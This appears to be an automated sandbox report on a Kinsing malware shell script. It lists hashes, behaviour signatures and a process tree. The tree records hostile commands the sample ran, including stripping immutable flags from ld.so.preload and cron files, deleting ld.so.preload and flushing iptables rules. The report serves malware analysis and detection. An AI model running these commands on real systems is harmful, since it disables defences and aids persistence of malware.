Analysis
-
max time kernel
82s -
max time network
129s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
24/02/2025, 03:13
Static task
static1
Behavioral task
behavioral1
Sample
8c4a05e63a083c05af96e08fcb3176ad22b4412d678dbe4b23464ff2658b4aa2.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
8c4a05e63a083c05af96e08fcb3176ad22b4412d678dbe4b23464ff2658b4aa2.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
8c4a05e63a083c05af96e08fcb3176ad22b4412d678dbe4b23464ff2658b4aa2.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
8c4a05e63a083c05af96e08fcb3176ad22b4412d678dbe4b23464ff2658b4aa2.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
8c4a05e63a083c05af96e08fcb3176ad22b4412d678dbe4b23464ff2658b4aa2.sh
-
Size
15KB
-
MD5
de04868319719fe6cae75e0e95f1ff99
-
SHA1
89b5c616e043bd9a76a60bd51f69072b4865647c
-
SHA256
8c4a05e63a083c05af96e08fcb3176ad22b4412d678dbe4b23464ff2658b4aa2
-
SHA512
2aa88141791089306e2977182152747f47e623627568e6dfe992b38b7ed51a2c46108d3391127e151206e6d7a91884caa87c4c9fa7c5ac677219d68b3e03f4bb
-
SSDEEP
384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJw3:trgXux7YJDj8OoJw3
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral3/files/fstream-17.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral3/files/fstream-16.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload 8c4a05e63a083c05af96e08fcb3176ad22b4412d678dbe4b23464ff2658b4aa2.sh -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1695 chmod 1697 chmod 1702 chmod 1704 chmod 1710 chmod 1711 chmod 1684 chmod 1686 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1712 8c4a05e63a083c05af96e08fcb3176ad22b4412d678dbe4b23464ff2658b4aa2.sh -
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 717 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1432 sudo -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 711 chattr 713 chattr 1542 xargs 1592 xargs 1598 xargs 1617 sed 704 chattr 1475 xargs 1596 sed 1614 sed 1595 xargs 1496 xargs 1530 xargs 1593 sed 1599 sed 1608 sed 1619 xargs 1678 xargs 1465 xargs 1511 xargs 1523 xargs 1554 xargs 1586 xargs 1604 xargs 1610 xargs 1639 xargs 1480 xargs 1548 xargs 1590 sed 1602 sed 1611 sed 1616 xargs 1673 xargs 1587 sed 1589 xargs 1613 xargs 1620 sed 1622 xargs 1651 xargs 1441 uname 1486 xargs 1501 xargs 1506 xargs 1518 xargs 1536 xargs 1601 xargs 1634 xargs 1470 xargs 1491 xargs 1662 xargs -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.4tDa0w crontab File opened for modification /var/spool/cron/crontabs/tmp.90ucXR crontab File opened for modification /var/spool/cron/crontabs/tmp.r3celz crontab File opened for modification /var/spool/cron/crontabs/tmp.adh7KZ crontab File opened for modification /var/spool/cron/crontabs/tmp.nmguZX crontab File opened for modification /var/spool/cron/crontabs/tmp.4WejlV crontab File opened for modification /var/spool/cron/crontabs/tmp.KBS3SH crontab File opened for modification /var/spool/cron/crontabs/tmp.OjGXAh crontab File opened for modification /var/spool/cron/crontabs/tmp.JaosLP crontab File opened for modification /var/spool/cron/crontabs/tmp.JmvFOb crontab File opened for modification /var/spool/cron/crontabs/tmp.45DN7H crontab File opened for modification /var/spool/cron/crontabs/tmp.SYV3Ds crontab File opened for modification /var/spool/cron/crontabs/tmp.PRjelh crontab File opened for modification /var/spool/cron/crontabs/tmp.sG8rRg crontab File opened for modification /var/spool/cron/crontabs/tmp.5EKTO3 crontab File opened for modification /var/spool/cron/crontabs/tmp.AeLLuw crontab File opened for modification /var/spool/cron/crontabs/tmp.7FEnIX crontab File opened for modification /var/spool/cron/crontabs/tmp.Iiln9g crontab File opened for modification /var/spool/cron/crontabs/tmp.SOU42O crontab File opened for modification /var/spool/cron/crontabs/tmp.jMNBz7 crontab File opened for modification /var/spool/cron/crontabs/tmp.iJj5eB crontab File opened for modification /var/spool/cron/crontabs/tmp.6V9gci crontab File opened for modification /var/spool/cron/crontabs/tmp.PELaFb crontab File opened for modification /var/spool/cron/crontabs/tmp.LDBQOw crontab File opened for modification /var/spool/cron/crontabs/tmp.srJFiQ crontab File opened for modification /var/spool/cron/crontabs/tmp.I1iVtg crontab File opened for modification /var/spool/cron/crontabs/tmp.Ka9ajA crontab File opened for modification /var/spool/cron/crontabs/tmp.l9VqBc crontab File opened for modification /var/spool/cron/crontabs/tmp.11sy0d crontab File opened for modification /var/spool/cron/crontabs/tmp.Y0aPpv crontab File opened for modification /var/spool/cron/crontabs/tmp.J4iJvp crontab File opened for modification /var/spool/cron/crontabs/tmp.IoNfyb crontab File opened for modification /var/spool/cron/crontabs/tmp.JIwAlx crontab File opened for modification /var/spool/cron/crontabs/tmp.wjaDTq crontab File opened for modification /var/spool/cron/crontabs/tmp.hhuFUE crontab File opened for modification /var/spool/cron/crontabs/tmp.3xRYsa crontab File opened for modification /var/spool/cron/crontabs/tmp.E8YV5C crontab File opened for modification /var/spool/cron/crontabs/tmp.d8cRQU crontab File opened for modification /var/spool/cron/crontabs/tmp.ZT0S2f crontab File opened for modification /var/spool/cron/crontabs/tmp.EGVWZu crontab File opened for modification /var/spool/cron/crontabs/tmp.7Q7peb crontab File opened for modification /var/spool/cron/crontabs/tmp.Aj6nzF crontab File opened for modification /var/spool/cron/crontabs/tmp.fHrxLK crontab File opened for modification /var/spool/cron/crontabs/tmp.1SDSzR crontab File opened for modification /var/spool/cron/crontabs/tmp.bnsOVq crontab File opened for modification /var/spool/cron/crontabs/tmp.MIuMvU crontab File opened for modification /var/spool/cron/crontabs/tmp.hEGPJs crontab File opened for modification /var/spool/cron/crontabs/tmp.FFJ7OS crontab File opened for modification /var/spool/cron/crontabs/tmp.kw5tTD crontab File opened for modification /var/spool/cron/crontabs/tmp.hNq9Ga crontab File opened for modification /var/spool/cron/crontabs/tmp.h6NmKM crontab File opened for modification /var/spool/cron/crontabs/tmp.zwMiNP crontab File opened for modification /var/spool/cron/crontabs/tmp.1uef41 crontab File opened for modification /var/spool/cron/crontabs/tmp.0C78Ge crontab File opened for modification /var/spool/cron/crontabs/tmp.t2cbB4 crontab File opened for modification /var/spool/cron/crontabs/tmp.1bUms0 crontab File opened for modification /var/spool/cron/crontabs/tmp.Fs99V4 crontab File opened for modification /var/spool/cron/crontabs/tmp.8ezjTj crontab File opened for modification /var/spool/cron/crontabs/tmp.qqYFKD crontab File opened for modification /var/spool/cron/crontabs/tmp.cQHUDZ crontab File opened for modification /var/spool/cron/crontabs/tmp.P7f3AQ crontab File opened for modification /var/spool/cron/crontabs/tmp.LomZOL crontab File opened for modification /var/spool/cron/crontabs/tmp.AGgUZd crontab File opened for modification /var/spool/cron/crontabs/tmp.yBdO6M crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service 8c4a05e63a083c05af96e08fcb3176ad22b4412d678dbe4b23464ff2658b4aa2.sh -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1582 ps 1674 ps 1487 ps 1497 ps 1507 ps 1514 ps 1630 ps 1635 ps 1482 ps 1492 ps 1502 ps 1519 ps -
description ioc Process File opened for reading /proc/79/status pkill File opened for reading /proc/386/cmdline ps File opened for reading /proc/70/status pkill File opened for reading /proc/388/cmdline pkill File opened for reading /proc/700/cmdline pkill File opened for reading /proc/76/status pkill File opened for reading /proc/76/status pkill File opened for reading /proc/17/status pkill File opened for reading /proc/75/status ps File opened for reading /proc/15/status pkill File opened for reading /proc/385/status pkill File opened for reading /proc/5/status ps File opened for reading /proc/13/cmdline ps File opened for reading /proc/filesystems ls File opened for reading /proc/664/stat ps File opened for reading /proc/674/status pkill File opened for reading /proc/160/cmdline pkill File opened for reading /proc/696/cmdline pkill File opened for reading /proc/364/status ps File opened for reading /proc/1467/cmdline ps File opened for reading /proc/18/stat ps File opened for reading /proc/12/cmdline pkill File opened for reading /proc/695/cmdline pkill File opened for reading /proc/77/stat ps File opened for reading /proc/13/stat ps File opened for reading /proc/360/stat ps File opened for reading /proc/6/status pkill File opened for reading /proc/3/status pkill File opened for reading /proc/7/status pkill File opened for reading /proc/11/cmdline pkill File opened for reading /proc/sys/kernel/pid_max ps File opened for reading /proc/21/status pkill File opened for reading /proc/388/status pkill File opened for reading /proc/37/status pkill File opened for reading /proc/36/cmdline pkill File opened for reading /proc/1448/stat ps File opened for reading /proc/254/status ps File opened for reading /proc/695/cmdline ps File opened for reading /proc/12/cmdline ps File opened for reading /proc/234/cmdline pkill File opened for reading /proc/20/cmdline pkill File opened for reading /proc/1625/status pkill File opened for reading /proc/74/status pkill File opened for reading /proc/160/cmdline ps File opened for reading /proc/73/cmdline ps File opened for reading /proc/667/stat ps File opened for reading /proc/75/status pkill File opened for reading /proc/37/cmdline pkill File opened for reading /proc/16/cmdline pkill File opened for reading /proc/1670/cmdline ps File opened for reading /proc/11/cmdline pkill File opened for reading /proc/82/stat ps File opened for reading /proc/sys/kernel/pid_max ps File opened for reading /proc/366/cmdline ps File opened for reading /proc/18/status pkill File opened for reading /proc/5/cmdline pkill File opened for reading /proc/254/status ps File opened for reading /proc/76/status pkill File opened for reading /proc/697/status pkill File opened for reading /proc/335/cmdline ps File opened for reading /proc/669/status ps File opened for reading /proc/3/cmdline pkill File opened for reading /proc/664/cmdline pkill File opened for reading /proc/695/status pkill -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1387 ls 1814 sed
Processes
-
/tmp/8c4a05e63a083c05af96e08fcb3176ad22b4412d678dbe4b23464ff2658b4aa2.sh/tmp/8c4a05e63a083c05af96e08fcb3176ad22b4412d678dbe4b23464ff2658b4aa2.sh1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:700 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:704
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:709
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵
- Attempts to change immutable files
PID:711
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:713
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:717
-
-
/bin/grepgrep exe2⤵PID:727
-
-
/bin/lsls -latrh /proc/12⤵PID:726
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:730
-
-
/bin/grepgrep exe2⤵PID:733
-
-
/bin/lsls -latrh /proc/102⤵PID:732
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:737
-
-
/bin/grepgrep exe2⤵PID:740
-
-
/bin/lsls -latrh /proc/112⤵PID:739
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:743
-
-
/bin/grepgrep exe2⤵PID:748
-
-
/bin/lsls -latrh /proc/1102⤵PID:747
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:750
-
-
/bin/grepgrep exe2⤵PID:754
-
-
/bin/lsls -latrh /proc/122⤵PID:753
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:756
-
-
/bin/grepgrep exe2⤵PID:759
-
-
/bin/lsls -latrh /proc/1262⤵PID:758
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:762
-
-
/bin/lsls -latrh /proc/1272⤵PID:764
-
-
/bin/grepgrep exe2⤵PID:765
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:767
-
-
/bin/grepgrep exe2⤵PID:770
-
-
/bin/lsls -latrh /proc/132⤵PID:769
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:772
-
-
/bin/grepgrep exe2⤵PID:775
-
-
/bin/lsls -latrh /proc/142⤵PID:774
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:777
-
-
/bin/lsls -latrh /proc/152⤵PID:779
-
-
/bin/grepgrep exe2⤵PID:780
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:782
-
-
/bin/grepgrep exe2⤵PID:785
-
-
/bin/lsls -latrh /proc/1532⤵PID:784
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:787
-
-
/bin/grepgrep exe2⤵PID:790
-
-
/bin/lsls -latrh /proc/162⤵PID:789
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:792
-
-
/bin/grepgrep exe2⤵PID:795
-
-
/bin/lsls -latrh /proc/1602⤵PID:794
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:797
-
-
/bin/grepgrep exe2⤵PID:800
-
-
/bin/lsls -latrh /proc/172⤵PID:799
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:802
-
-
/bin/grepgrep exe2⤵PID:805
-
-
/bin/lsls -latrh /proc/1762⤵
- Reads runtime system information
PID:804
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:807
-
-
/bin/grepgrep exe2⤵PID:810
-
-
/bin/lsls -latrh /proc/182⤵PID:809
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:812
-
-
/bin/grepgrep exe2⤵PID:815
-
-
/bin/lsls -latrh /proc/192⤵PID:814
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:817
-
-
/bin/grepgrep exe2⤵PID:820
-
-
/bin/lsls -latrh /proc/22⤵PID:819
-
-
